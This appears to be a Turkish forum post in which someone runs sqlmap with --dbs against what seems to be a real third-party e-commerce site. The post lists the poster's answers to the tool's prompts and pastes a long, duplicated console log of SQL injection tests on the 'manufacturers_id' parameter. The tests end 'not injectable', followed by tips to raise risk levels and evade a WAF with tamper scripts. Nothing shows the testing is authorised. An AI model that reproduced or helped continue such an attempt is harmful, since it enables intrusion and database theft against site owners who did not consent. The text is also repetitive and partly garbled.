Çalıştırdım komut : sqlmap.py -u Zalman, זיגזג פתרונות מחשוב --dbs
Coockie kısmına y
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? kısmına Y
testing for SQL injection on GET parameter 'manufacturers_id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
UNION Text:Y
Hata: to perform more tests. You can give it a go with the switch '--text-only' if the target page has a low percentage of textual content (~10.82% of page content is text). As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
Coockie kısmına y
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? kısmına Y
testing for SQL injection on GET parameter 'manufacturers_id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
UNION Text:Y
Hata: to perform more tests. You can give it a go with the switch '--text-only' if the target page has a low percentage of textual content (~10.82% of page content is text). As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
you have not declared cookie(s), while server wants to set its own ('osCsid=6hhu603ej88...4cb9pgj7uv'). Do you want to use those [Y/n] y
[15:21:59] [INFO] testing if the target URL content is stable
[15:22:00] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[15:22:07] [INFO] searching for dynamic content
[15:22:11] [INFO] dynamic content marked for removal (187 regions)
[15:22:12] [INFO] testing if GET parameter 'manufacturers_id' is dynamic
[15:22:14] [INFO] GET parameter 'manufacturers_id' appears to be dynamic
[15:22:15] [INFO] heuristic (basic) test shows that GET parameter 'manufacturers_id' might be injectable (possible DBMS: 'MySQL')
[15:22:16] [INFO] testing for SQL injection on GET parameter 'manufacturers_id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[15:22:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:22:47] [WARNING] reflective value(s) found and filtering out
[15:22:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:22:58] [INFO] testing 'Generic inline queries'
[15:22:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:23:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:24:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[15:25:06] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:26:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:27:20] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:28:50] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:29:58] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:31:40] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:32:45] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:34:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[15:34:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[15:34:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[15:34:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[15:34:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[15:34:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[15:34:13] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[15:34:55] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[15:34:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:35:37] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:36:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:37:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:37:40] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:38:23] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:39:03] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:39:44] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:40:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:41:07] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:41:49] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:42:31] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:43:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:43:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:44:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:45:12] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[15:45:53] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[15:46:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:46:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[15:46:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[15:46:45] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[15:46:46] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[15:46:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:46:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[15:46:49] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[15:46:49] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[15:46:51] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[15:46:52] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[15:46:53] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[15:46:55] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:46:56] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[15:46:58] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[15:46:59] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:47:01] [INFO] testing 'MySQL inline queries'
[15:47:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:47:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:47:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:48:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:48:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:48:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:49:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:49:58] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[15:50:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[15:51:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[15:51:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[15:52:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[15:52:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[15:52:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[15:53:21] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[15:53:55] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[15:54:33] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[15:55:08] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[15:55:41] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[15:56:05] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[15:56:27] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[15:56:50] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[15:57:12] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[15:57:44] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[15:58:06] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[15:58:39] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[15:59:01] [INFO] testing 'MySQL AND time-based blind (ELT)'
[15:59:38] [INFO] testing 'MySQL OR time-based blind (ELT)'
[16:00:13] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[16:00:35] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[16:00:58] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:01:25] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:01:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[16:01:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[16:01:43] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[16:01:43] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[16:02:19] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[16:02:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[16:02:21] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[16:02:21] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[16:02:23] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[16:02:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:02:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:03:16] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[16:03:57] [WARNING] GET parameter 'manufacturers_id' does not seem to be injectable
[16:03:57] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. You can give it a go with the switch '--text-only' if the target page has a low percentage of textual content (~10.82% of page content is text). As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[15:21:59] [INFO] testing if the target URL content is stable
[15:22:00] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[15:22:07] [INFO] searching for dynamic content
[15:22:11] [INFO] dynamic content marked for removal (187 regions)
[15:22:12] [INFO] testing if GET parameter 'manufacturers_id' is dynamic
[15:22:14] [INFO] GET parameter 'manufacturers_id' appears to be dynamic
[15:22:15] [INFO] heuristic (basic) test shows that GET parameter 'manufacturers_id' might be injectable (possible DBMS: 'MySQL')
[15:22:16] [INFO] testing for SQL injection on GET parameter 'manufacturers_id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[15:22:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:22:47] [WARNING] reflective value(s) found and filtering out
[15:22:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:22:58] [INFO] testing 'Generic inline queries'
[15:22:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:23:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:24:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[15:25:06] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:26:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:27:20] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:28:50] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:29:58] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:31:40] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:32:45] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:34:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[15:34:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[15:34:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[15:34:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[15:34:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[15:34:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[15:34:13] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[15:34:55] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[15:34:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:35:37] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:36:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:37:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:37:40] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:38:23] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:39:03] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:39:44] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:40:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:41:07] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:41:49] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:42:31] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:43:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:43:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:44:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:45:12] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[15:45:53] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[15:46:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:46:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[15:46:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[15:46:45] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[15:46:46] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[15:46:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:46:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[15:46:49] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[15:46:49] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[15:46:51] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[15:46:52] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[15:46:53] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[15:46:55] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:46:56] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[15:46:58] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[15:46:59] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:47:01] [INFO] testing 'MySQL inline queries'
[15:47:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:47:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:47:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:48:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:48:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:48:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:49:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:49:58] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[15:50:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[15:51:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[15:51:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[15:52:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[15:52:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[15:52:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[15:53:21] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[15:53:55] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[15:54:33] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[15:55:08] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[15:55:41] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[15:56:05] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[15:56:27] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[15:56:50] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[15:57:12] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[15:57:44] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[15:58:06] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[15:58:39] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[15:59:01] [INFO] testing 'MySQL AND time-based blind (ELT)'
[15:59:38] [INFO] testing 'MySQL OR time-based blind (ELT)'
[16:00:13] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[16:00:35] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[16:00:58] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:01:25] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:01:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[16:01:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[16:01:43] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[16:01:43] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[16:02:19] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[16:02:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[16:02:21] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[16:02:21] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[16:02:23] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[16:02:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:02:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:03:16] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[16:03:57] [WARNING] GET parameter 'manufacturers_id' does not seem to be injectable
[16:03:57] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. You can give it a go with the switch '--text-only' if the target page has a low percentage of textual content (~10.82% of page content is text). As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'